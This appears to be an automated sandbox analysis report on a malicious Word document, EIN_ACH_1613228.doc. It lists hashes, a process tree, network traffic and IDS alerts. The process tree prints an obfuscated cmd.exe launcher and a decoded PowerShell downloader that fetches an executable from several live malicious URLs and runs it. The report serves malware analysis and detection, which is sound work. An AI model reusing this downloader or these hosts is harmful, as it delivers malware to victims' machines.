File name: | EIN_ACH_1613228.doc |
Full analysis: | https://app.any.run/tasks/049a7034-5545-447b-8197-dbd46a9ae513 |
Verdict: | Malicious activity |
Analysis date: | December 14, 2018, 18:24:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 13 13:30:00 2018, Last Saved Time/Date: Thu Dec 13 13:30:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 15, Security: 0 |
MD5: | B9C298F0786F81580D3D45AF4B8142DB |
SHA1: | 8A134C7E5000D5FF97C5E6D2B14885A1216CEB27 |
SHA256: | 3E8BDDB35881CF51D27A9749260BBE73FB940EEDF0B37EF1468EB3E85BF9E945 |
SSDEEP: | 1536:oocn1kp59gxBK85fBMvS0yxl9EaLS5SJ+a9:h41k/W48KvdwOaMS |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:13 13:30:00 |
ModifyDate: | 2018:12:13 13:30:00 |
Pages: | 1 |
Words: | 2 |
Characters: | 15 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 16 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3176 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\EIN_ACH_1613228.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2496 | c:\CXfzNwVLULp\hNazVzhpwZb\iKicBCX\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set 6L=zVFGzAsjrFkJdizmEJ8NptKX=Bfg,Tnoa:w7YH+lZ2Cx)6/QDPu'cq;5v}y.1WIOh@-\($Rb4S0 {e&&for %q in (69;12;23;39;24;51;40;62;50;51;54;69;23;70;42;24;30;77;34;66;31;71;7;77;52;21;75;19;77;21;59;61;77;71;42;39;13;77;30;21;54;69;36;37;25;24;51;64;21;21;20;33;46;46;27;32;8;15;32;30;39;31;27;13;6;21;13;52;59;52;31;15;46;7;50;65;64;21;21;20;33;46;46;60;45;35;59;60;60;72;59;41;55;55;59;55;74;46;15;65;64;21;21;20;33;46;46;20;13;39;10;31;15;59;50;39;15;59;32;52;59;13;12;46;31;65;64;21;21;20;33;46;46;71;32;6;13;52;10;13;59;52;31;15;46;20;72;15;39;23;19;21;6;65;64;21;21;20;33;46;46;71;39;13;6;21;50;6;59;21;20;6;59;39;21;46;12;36;58;31;23;51;59;73;20;39;13;21;68;51;65;51;44;54;69;26;16;9;24;51;6;13;14;51;54;69;31;15;6;75;24;75;51;72;72;51;54;69;7;19;63;24;51;61;49;49;51;54;69;31;22;14;24;69;77;30;56;33;21;77;15;20;38;51;67;51;38;69;31;15;6;38;51;59;77;43;77;51;54;26;31;8;77;32;52;64;68;69;52;49;63;75;13;30;75;69;36;37;25;44;76;21;8;58;76;69;23;70;42;59;48;31;34;30;39;31;32;12;9;13;39;77;68;69;52;49;63;28;75;69;31;22;14;44;54;69;3;15;20;24;51;71;62;13;51;54;62;26;75;68;68;3;77;21;66;62;21;77;15;75;69;31;22;14;44;59;39;77;30;27;21;64;75;66;27;77;75;18;74;74;74;74;44;75;76;62;30;56;31;10;77;66;62;21;77;15;75;69;31;22;14;54;69;29;36;5;24;51;23;52;47;51;54;71;8;77;32;10;54;57;57;52;32;21;52;64;76;57;57;69;29;53;23;24;51;13;34;17;51;54;84)do set MSVo=!MSVo!!6L:~%q,1!&&if %q==84 echo !MSVo:~6!|FOR /F "tokens=2 delims=q1C." %K IN ('ftype^^^|find "lCo"')DO %K -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3056 | CmD /V:ON/C"set 6L=zVFGzAsjrFkJdizmEJ8NptKX=Bfg,Tnoa:w7YH+lZ2Cx)6/QDPu'cq;5v}y.1WIOh@-\($Rb4S0 {e&&for %q in (69;12;23;39;24;51;40;62;50;51;54;69;23;70;42;24;30;77;34;66;31;71;7;77;52;21;75;19;77;21;59;61;77;71;42;39;13;77;30;21;54;69;36;37;25;24;51;64;21;21;20;33;46;46;27;32;8;15;32;30;39;31;27;13;6;21;13;52;59;52;31;15;46;7;50;65;64;21;21;20;33;46;46;60;45;35;59;60;60;72;59;41;55;55;59;55;74;46;15;65;64;21;21;20;33;46;46;20;13;39;10;31;15;59;50;39;15;59;32;52;59;13;12;46;31;65;64;21;21;20;33;46;46;71;32;6;13;52;10;13;59;52;31;15;46;20;72;15;39;23;19;21;6;65;64;21;21;20;33;46;46;71;39;13;6;21;50;6;59;21;20;6;59;39;21;46;12;36;58;31;23;51;59;73;20;39;13;21;68;51;65;51;44;54;69;26;16;9;24;51;6;13;14;51;54;69;31;15;6;75;24;75;51;72;72;51;54;69;7;19;63;24;51;61;49;49;51;54;69;31;22;14;24;69;77;30;56;33;21;77;15;20;38;51;67;51;38;69;31;15;6;38;51;59;77;43;77;51;54;26;31;8;77;32;52;64;68;69;52;49;63;75;13;30;75;69;36;37;25;44;76;21;8;58;76;69;23;70;42;59;48;31;34;30;39;31;32;12;9;13;39;77;68;69;52;49;63;28;75;69;31;22;14;44;54;69;3;15;20;24;51;71;62;13;51;54;62;26;75;68;68;3;77;21;66;62;21;77;15;75;69;31;22;14;44;59;39;77;30;27;21;64;75;66;27;77;75;18;74;74;74;74;44;75;76;62;30;56;31;10;77;66;62;21;77;15;75;69;31;22;14;54;69;29;36;5;24;51;23;52;47;51;54;71;8;77;32;10;54;57;57;52;32;21;52;64;76;57;57;69;29;53;23;24;51;13;34;17;51;54;84)do set MSVo=!MSVo!!6L:~%q,1!&&if %q==84 echo !MSVo:~6!|FOR /F "tokens=2 delims=q1C." %K IN ('ftype^^^|find "lCo"')DO %K -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3096 | C:\Windows\system32\cmd.exe /S /D /c" echo $dXl='ZIu';$XRC=new-object Net.WebClient;$YHB='http://garmanlogistic.com/ju@http://167.114.255.50/m@http://pilkom.ulm.ac.id/o@http://basicki.com/p4mlXNts@http://blistus.tps.lt/dYyoX'.Split('@');$fEF='siz';$oms = '44';$jNO='WPP';$oKz=$env:temp+'\'+$oms+'.exe';foreach($cPO in $YHB){try{$XRC.DownloadFile($cPO, $oKz);$Gmp='bIi';If ((Get-Item $oKz).length -ge 80000) {Invoke-Item $oKz;$TYA='XcQ';break;}}catch{}}$TqX='iwJ';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3168 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims=q1C." %K IN ('ftype^|find "lCo"') DO %K -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3604 | C:\Windows\system32\cmd.exe /c ftype|find "lCo" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3824 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3916 | find "lCo" | C:\Windows\system32\find.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (grep) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2624 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3700 | "C:\Users\admin\AppData\Local\Temp\44.exe" | C:\Users\admin\AppData\Local\Temp\44.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR842A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D06E1E5.wmf | — | |
MD5:— | SHA256:— | |||
3176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAD23B.wmf | — | |
MD5:— | SHA256:— | |||
2624 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1MS9I0GOC21MKDPFGVEA.temp | — | |
MD5:— | SHA256:— | |||
3176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76B7B6A2.wmf | wmf | |
MD5:8DB2AFD25AA7179CA487A94F1482C171 | SHA256:A8747D8E6F9BBE8B8B22019184A8CE5BD2E611B62C5663B5A15B9EA20C136C9B | |||
2624 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3176 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6E28B672E33ED44FA2233E4B0EA4D984 | SHA256:ECF9C6BE22E4A542EBECD6F2A9B2ABCD77BA994D3F8910570A44D4737F95D6E1 | |||
3176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$N_ACH_1613228.doc | pgc | |
MD5:3A8EB3FFA9728F3DCAA0AE7656ABA254 | SHA256:399A7C69D93171CE3C185CBE8194E0037689D67BE0D14FA8D9D396F676BFC38F | |||
3176 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:26B9B148A27F0945A321D9FA1621F842 | SHA256:94293562379CEC05DC451B6D7E5792CF62F88C70482DA8506D9E5A830B6E59C9 | |||
2624 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199aa0.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2624 | powershell.exe | GET | 200 | 212.227.251.235:80 | http://garmanlogistic.com/ju/ | DE | executable | 152 Kb | malicious |
2624 | powershell.exe | GET | 301 | 212.227.251.235:80 | http://garmanlogistic.com/ju | DE | html | 305 b | malicious |
2852 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2624 | powershell.exe | 212.227.251.235:80 | garmanlogistic.com | 1&1 Internet SE | DE | malicious |
2852 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
Domain | IP | Reputation |
---|---|---|
garmanlogistic.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2624 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2624 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2624 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2624 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |